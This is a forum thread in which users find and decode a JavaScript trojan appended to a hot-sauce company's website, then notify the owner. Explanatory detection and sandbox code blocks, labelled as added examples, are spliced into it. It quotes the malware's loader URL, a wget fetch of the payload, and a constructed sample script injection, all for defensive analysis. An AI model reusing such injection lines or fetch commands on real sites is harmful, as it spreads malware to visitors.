Topic: Chilli Willies trojan?
thermite
Posts: 2262
Location: Brisbane, Queensland
Anyone else get a trojan warning when they google "Chilli Willies"?

Here is the link but don't click on it without Avast!
Spoiler:
http://www.google.com.au/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-GB%3Aofficial&hs=nyq&q=chilli+willies&btnG=Search&meta=


Zylox
Posts: 1045
Location: Brisbane, Queensland
Damn lucky I had Avast on.
I don't think it's safe to link like that, man.

DON'T CLICK WITHOUT ANTIVIRUS!
trog
AGN Admin
Posts: 27537
Location: Brisbane, Queensland

You get a trojan warning when you just google that thing? What AV are you using? What browser/OS?
Zylox
Posts: 1046
Location: Brisbane, Queensland
Yeah, just from googling.
pARODY
Posts: 359
Location: Brisbane, Queensland
any details on the warning you got?
thermite
Posts: 2263
Location: Brisbane, Queensland
avast! here
If this is a false positive I would be so pissed if I was the Chilli Willies man (assuming there is such a man).
If this is their fault it brings new meaning to their slogan "Be WARNED I may BITE back!".
pARODY
Posts: 360
Location: Brisbane, Queensland
You can get potential warnings from javascript in a link on the site. I also see there is a youtube preview linked on that page when I load it. There are a number of flash/SWF exploits rolling around at the moment, but I've not seen them come from youtube (which is where that video is from).
Zylox
Posts: 1047
Location: Brisbane, Queensland
Js: Cruiser-B [Trj]
Trojan
thermite
Posts: 2264
Location: Brisbane, Queensland
A trojan horse was found, yadda yadda yadda

Filename: http://www.chilliwillies.com.au/
Malware name: JS:Cruzer-B [Trj]
Malware type: Trojan Horse
VPS version: 090804-0, 04/08/2009
pARODY
Posts: 361
Location: Brisbane, Queensland
Ok, it's been compromised.

Looking into it now.

wget the front page and after a chunk of whitespace is some appended javascript.

Nice catch Avast! :P
BillyHardball
Posts: 9537
Location: Brisbane, Queensland
Why would you google Chilli Willies? Is that some sort of gay restaurant or something?
trog
AGN Admin
Posts: 27538
Location: Brisbane, Queensland

> Ok, it's been compromised.
>
> Looking into it now.
>
> wget the front page and after a chunk of whitespace is some appended javascript.
>
> Nice catch Avast! :P
Weird, I don't see that after going to the page and saving it out as .html (from Firefox).

lemme know if I need to start panicking
thermite
Posts: 2265
Location: Brisbane, Queensland
> Chilli Willies? Is that some sort of gay restaurant or something?

Why don't you look at the site and find out? :D

It's an Australian company that makes chilli sauces. I was just enjoying splashing some on my kebab right now and thought I'd look up their site.
Zylox
Posts: 1049
Location: Brisbane, Queensland
Ahh, yes I have their "Calypso Tropical Butt Burner" in the cupboard. Got it at the Chop Shop in the Coco's complex @ Annerley about 3 years ago.
pARODY
Posts: 362
Location: Brisbane, Queensland
The html file when I viewed it in hex has the whitespace filled with %0a%0d which is /r/n. So your normal viewer may not load it correctly. I used Wget on a linux box and then just cat the index.html and see the script.
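The pattern pARODY describes (a script appended after the real page, hidden behind a long run of CR/LF bytes so it scrolls out of view in a casual viewer) is easy to check for mechanically. The following is an added example, not code from the thread or from any tool mentioned in it; it assumes Node.js and uses constructed HTML, with the clean page beside an injected copy.

```javascript
// Added example (not from the thread): find <script> blocks that sit after the
// page's closing </html> tag, and measure the whitespace padding in front of
// them. Assumes Node.js; both pages below are constructed for illustration.

const SCRIPT_RE = /<script\b[^>]*>[\s\S]*?<\/script\s*>/gi;

// Returns { trailerOffset, paddingLength, scripts }: the byte offset where the
// trailer (everything after the last </html>) starts, how many whitespace
// characters (space, tab, CR, LF) open that trailer, and the <script> blocks
// found inside it. Nothing legitimate normally lives past </html>.
function findTrailingScripts(html) {
  const endIdx = html.toLowerCase().lastIndexOf('</html>');
  if (endIdx < 0) {
    return { trailerOffset: -1, paddingLength: 0, scripts: [] };
  }
  const trailerOffset = endIdx + '</html>'.length;
  const trailer = html.slice(trailerOffset);
  const paddingLength = trailer.match(/^[ \t\r\n]*/)[0].length;
  const scripts = trailer.match(SCRIPT_RE) || [];
  return { trailerOffset, paddingLength, scripts };
}

// One-line verdict for a fetched page.
function describe(html) {
  const r = findTrailingScripts(html);
  if (r.scripts.length === 0) return 'no script after </html>';
  return `${r.scripts.length} script block(s) after </html>, hidden behind ${r.paddingLength} whitespace bytes`;
}

// Constructed samples: a clean page, and the same page with an injected trailer
// padded by 300 "\n\r" pairs (the 0a 0d bytes seen in the hex dump).
const CLEAN_PAGE =
  '<html><head><title>Sauces</title></head><body><p>Hot sauce</p></body></html>\n';
const INJECTED_PAGE =
  CLEAN_PAGE.trimEnd() +
  '\n\r'.repeat(300) +
  '<script type="text/javascript">document.write("<img src=\'http://tracker.invalid/p.gif\'>")</script>';

console.log('clean page:    ', describe(CLEAN_PAGE));
console.log('injected page: ', describe(INJECTED_PAGE));
```

Run it against the output of a raw fetch (wget, curl) rather than a browser "save as", since a browser re-serialises the DOM and may drop or move the trailer, which matches trog's observation that the saved .html looked clean.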
vbcoder
Posts: 158
Location: Townsville, Queensland
I clicked it and got no virus warning.

I don't have antivirus either.
trog
AGN Admin
Posts: 27539
Location: Brisbane, Queensland

> The html file when I viewed it in hex has the whitespace filled with %0a%0d which is /r/n. So your normal viewer may not load it correctly. I used Wget on a linux box and then just cat the index.html and see the script.
Yeh, wget was the first thing I tried, except weirdly (in Windows anyway) wget'ing that URL gives me a 403 error.
thermite
Posts: 2266
Location: Brisbane, Queensland
Funny story: reading the above post I didn't know you could wget in Windows, so I googled "wget in windows" and on the first page is trog's website.
lewd
Posts: 175
Location: Brisbane, Queensland
I googled 'chilli willies'. Their website was at the top of the search results. I clicked the link, went to their site... what next?
Clubby
Posts: 230
Location: Brisbane, Queensland
enter your credit card details :)
Spook
Posts: 25824
Location: Brisbane, Queensland
hot ranga > chilli willies
pARODY
Posts: 363
Location: Brisbane, Queensland
Just finished decoding the javascript, and the link it went to is now dead. :(

It was redirecting to a dynamic downloader on http://www.google analitics ">.net/__utb.js?"+document.reerrer+"\"> but was broken in the script :]

[parody@vps ~]$ wget "http://www.google analitics .net/__utb.js" -U="Internet Explorer 6.0"
--16:35:57-- http://www.google analitics .net/__utb.js
Resolving www.google analitics .net... 85.249.131.46
Connecting to www.google analitics .net|85.249.131.46|:80...
and that connection times out.

My personal shell has the IP cached. My work threatbox doesn't :(

parody@threatbox:~$ nslookup www.google analitics .net
Server: 4.2.2.1
Address: 4.2.2.1#53

Non-authoritative answer:
Name: www.google analitics .net
Address: 127.0.0.1

parody@threatbox:~$

If I wasn't so busy I could have caught the binary :( oh well.
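Two things in pARODY's findings above are worth turning into a repeatable check: the script loaded from a host spelt to look like Google Analytics, and the later lookup that answered 127.0.0.1, which is what a sinkholed or taken-down domain typically returns. The following is an added example, not from the thread; it assumes Node.js, takes the resolver answers as input so it runs offline, and uses constructed hostnames under the reserved .invalid TLD and documentation IP addresses.

```javascript
// Added example (not from the thread): flag a script host that is a near
// misspelling of a known analytics host, and note when DNS answers only with
// loopback addresses (a common sinkhole response). Assumes Node.js; the
// hostnames and resolver answers below are constructed.

const KNOWN_GOOD_HOSTS = ['www.google-analytics.com', 'ssl.google-analytics.com'];
const LOOKALIKE_MAX_DISTANCE = 2;

// Levenshtein edit distance, single-row dynamic programming.
function editDistance(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, i) => i);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + cost);
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Reduces a hostname to the part a lookalike imitates: lower-case, drop a
// leading "www.", drop the TLD, drop dots and hyphens.
function hostKey(host) {
  const labels = host.toLowerCase().replace(/^www\./, '').split('.');
  if (labels.length > 1) labels.pop();
  return labels.join('').replace(/-/g, '');
}

function isSinkholeAddress(ip) {
  return /^127\./.test(ip) || ip === '0.0.0.0' || ip === '::1';
}

// host: where a decoded script tries to load from; addresses: what DNS returned.
function assess(host, addresses) {
  const sinkholed = addresses.length > 0 && addresses.every(isSinkholeAddress);
  if (KNOWN_GOOD_HOSTS.includes(host.toLowerCase())) {
    return { host, verdict: 'known-good', closest: host, distance: 0, sinkholed };
  }
  const key = hostKey(host);
  let closest = null;
  let best = Infinity;
  for (const good of KNOWN_GOOD_HOSTS) {
    const d = editDistance(key, hostKey(good));
    if (d < best) { best = d; closest = good; }
  }
  const verdict = best <= LOOKALIKE_MAX_DISTANCE ? 'lookalike' : 'unknown';
  return { host, verdict, closest, distance: best, sinkholed };
}

// Constructed inputs: a lookalike that now resolves to loopback, the genuine
// host, and an unrelated host.
const SAMPLES = [
  ['www.googleanalitics.invalid', ['127.0.0.1']],
  ['www.google-analytics.com', ['203.0.113.5']],
  ['cdn.example.invalid', ['203.0.113.9']],
];
for (const [host, addrs] of SAMPLES) console.log(assess(host, addrs));
```

A "lookalike" verdict on a script source is the thing to alert on; the sinkhole flag only tells you the domain has already been dealt with upstream, which is why the binary could no longer be fetched here.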
pARODY
Posts: 364
Location: Brisbane, Queensland
Took too long to rebuild my spidermonkey install. Makes processing javascript so easy but new threatbox didn't have it installed. Very handy tool if you're into malware analysis. Mine is modded to include handling of document.write, eval() and alert() to external files. It still sucks for recursive code that needs to be decoded to fix the references to defines in the javascript. Have to cut and process in steps to figure that out and then build a big final script to process the lot.

http://blog.didierstevens.com/programs/spidermonkey/ this already has some modifications done to it which I based my further mods from.
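The approach pARODY describes, running the obfuscated script in an engine whose eval(), document.write() and alert() have been replaced with versions that record their arguments, can be reproduced without patching an engine. The following is an added example, not code from the thread and not Didier Stevens' SpiderMonkey modification; it assumes Node.js and feeds a constructed, harmless two-layer sample through logging hooks, unwrapping each eval() layer automatically (the recursive case the post calls painful).

```javascript
// Added example (not from the thread): "log instead of execute" hooks for
// eval(), document.write() and alert(), using plain Node.js. Assumes Node.js;
// the obfuscated sample at the bottom is constructed and does nothing.

const MAX_DEPTH = 10;

// Runs `code` with eval/document/alert/window shadowed by logging hooks. Each
// captured call is appended to `log` as {depth, api, value}; a string handed to
// eval() is analysed one layer deeper instead of being executed.
function analyse(code, depth = 0, log = []) {
  if (depth > MAX_DEPTH) {
    log.push({ depth, api: 'error', value: 'max depth exceeded' });
    return log;
  }
  const record = (api) => (value) => { log.push({ depth, api, value: String(value) }); };
  const hookedEval = (s) => {
    record('eval')(s);
    analyse(String(s), depth + 1, log);   // next layer, still hooked
    return undefined;                     // the real eval's return value is not reproduced
  };
  const fakeDocument = {
    write: record('document.write'),
    writeln: record('document.write'),
    referrer: 'http://referrer.invalid/', // constructed placeholder, as the sample reads it
  };
  const hookedAlert = record('alert');
  const fakeWindow = { eval: hookedEval, document: fakeDocument, alert: hookedAlert };
  try {
    // Parameters named eval/document/alert/window shadow the real globals inside
    // the body. Function bodies are sloppy-mode, so `eval` is a legal parameter
    // name, and a call to it inside the sample is simply a call to our hook.
    new Function('eval', 'document', 'alert', 'window', code)(
      hookedEval, fakeDocument, hookedAlert, fakeWindow);
  } catch (e) {
    log.push({ depth, api: 'error', value: `${e.name}: ${e.message}` });
  }
  return log;
}

// Collects src= URLs from everything the sample tried to document.write().
function extractScriptSources(log) {
  const out = [];
  for (const entry of log) {
    if (entry.api !== 'document.write') continue;
    for (const m of entry.value.matchAll(/\bsrc=["']([^"']+)["']/gi)) out.push(m[1]);
  }
  return out;
}

// Constructed sample: the inner layer is split into fragments and only becomes
// a document.write() of a <script src=...> once eval() joins it back together.
const SAMPLE = `
var parts = ["docu", "ment.write('<scr' + 'ipt src=\\"http://analytics-lookalike.invalid/__utb.js?' + document.referrer + '\\"></scr' + 'ipt>')"];
eval(parts.join(''));
`;

const captured = analyse(SAMPLE);
for (const e of captured) console.log(`[depth ${e.depth}] ${e.api}: ${e.value}`);
console.log('script sources:', extractScriptSources(captured));
```

Shadowing via a sloppy-mode Function body is not a security boundary: the sample still runs with the process's privileges and could reach anything else on the global object, so this is for samples you have already judged inert, on a throwaway analysis box, exactly as the thread does it.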
thermite
Posts: 2267
Location: Brisbane, Queensland
just gonna write their details here while I've got the sauce bottle with me

Chilli Willies, 4 Cowley Dr, Flinders View, Q, 4305
07 3288 6228, 0419 646 305, info@chilliwillies.com.au

might send an email or something later?

last edited by thermite at 16:56:13 04/Aug/09
pARODY
Posts: 365
Location: Brisbane, Queensland
I've just sent an email to the chilliwillies guys to inform them of the infection. Should hopefully get them fixed up quick. :]
thermite
Posts: 2268
Location: Brisbane, Queensland

Cool, well nerded.
pARODY
Posts: 366
Location: Brisbane, Queensland
Nerding? I do! :]

last edited by pARODY at 17:42:55 04/Aug/09
trog
AGN Admin
Posts: 27540
Location: Brisbane, Queensland

> Just finished decoding the javascript, and the link it went to is now dead. :(
Googling tells me it's an attack thing that was around last year, so I'm guessing it's been long gone.
pARODY
Posts: 367
Location: Brisbane, Queensland
I just checked our known_malicious list and it's a site that has been around since 2002 and changed owners a couple of times but always involved in hosting dodgy stuff. Last activity on our list is from February.
HeardY
Gaelic newb
Posts: 16371
Location: Ireland
Jesus, there is plenty of nerding it up in this thread.

well played old chaps
Fester
Posts: 1
Location: Queensland

Hi, Chilli Willies here. Yes, there was a trojan on my web site but this has been removed; it was a script on the title page. Not much good all talking about it and not telling me??
Fester
Posts: 2
Location: Queensland

Thank you for the was not sure who sent it as I get so much spam
Fester
Posts: 3
Location: Queensland

I have owned Chilli Willies Sauces since 2001 and wonder what is so dodgy about hot sauce?
Fester
Posts: 4
Location: Queensland

Chilli Willies here. Yes, pissed off, considering I knew nothing of the trojan.
thermite
Posts: 2420
Location: Brisbane, Queensland
Well, your poo feels like it's got razor blades in it.

Anyways, I think he meant the website/host was dodgy, not the sauce.
Fester
Posts: 5
Location: Queensland

Web host is Melbourne IT. When I found out about the Trojan I called them; they confirmed it and removed it for me straight away.
© Copyright 2001-2026 AusGamers Pty Ltd. ACN 093 772 242.